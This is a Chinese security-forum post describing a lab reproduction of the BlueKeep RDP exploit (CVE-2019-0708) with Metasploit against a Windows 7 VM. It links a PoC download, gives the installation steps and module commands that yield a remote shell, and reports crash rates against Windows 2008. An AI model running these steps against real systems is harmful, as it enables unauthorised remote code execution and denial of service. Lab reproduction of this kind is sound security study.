查看: 16086|回复: 3

CVE-2019-0708复现过程以及稳定性测试

[复制链接]
发表于 2019-9-9 21:13:44 | 显示全部楼层 |阅读模式
作者:08sec-Dmagic
准备材料 Windows7 和 windows2008 r2的镜像 poc下载链接: https://pan.baidu.com/s/1TAhulC6IVhcn8OmBOHX4xA 提取码: 3d7d

目标ip:192.168.3.20 本机ip:192.168.3.24 目标os:windows 7 SP1 X64 本机os:kali 目标RDP端口:3389

测试过程: 先更新一下 Msf Curl https://raw.githubusercontent.co ... ppers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

然后将各个文件分别放入
[AppleScript] 纯文本查看 复制代码
/opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
/opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
/opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
/opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb


使用msfconsole进入metasploit-framework
11_50_35_52410.jpg
进入以后使用reload_all重新加载0708rdp利用模块
11_51_05_46114.jpg
使用
[AppleScript] 纯文本查看 复制代码
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
启用0708RDP攻击模块
11_51_21_78049.jpg
使用info查看工具相关信息以及设置 可见关键设置主要为
[AppleScript] 纯文本查看 复制代码
RHOSTS\ RPORT \ target

11_51_50_38383.jpg
使用set RHOSTS 受害机IP设置受害机IP

使用set RPORT 受害机PORT设置受害机RDP端口号

使用set target ID数字(可选为0-4)设置受害机机器架构

这里我们使用的是VMware Fusion,那么target 3满足条件

使用run开始攻击,等待建立连接

然后shell接着python就好了

11_52_01_96326.jpg

稳定性测试:windows7 测试五次全部成功 windows2008 十次全部蓝屏。
回复

使用道具 举报

发表于 2019-9-17 14:16:02 | 显示全部楼层
回复

使用道具 举报

发表于 2019-9-18 18:19:47 | 显示全部楼层
回复 支持 反对

使用道具 举报

发表于 2020-2-20 18:37:50 | 显示全部楼层
来支持下
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 15:08 , Processed in 0.045558 second(s), 12 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部